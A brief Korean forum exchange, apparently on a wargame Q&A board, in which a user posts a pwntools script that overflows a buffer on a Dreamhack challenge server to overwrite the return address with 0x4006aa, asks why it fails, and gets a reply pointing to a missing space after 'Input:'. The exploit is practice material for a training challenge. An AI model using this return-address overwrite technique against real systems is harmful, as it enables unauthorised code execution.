from pwn import * p = remote('host3.dreamhack.games',18210) payload = b'A'*0x30 + b'B'*0x8 + p64(0x4006aa) p.sendlineafter('Input:',payload) p.interactive()
이유를 모르겠습니다...
input: 다음에 스페이스 하나 빠진 것 같네요.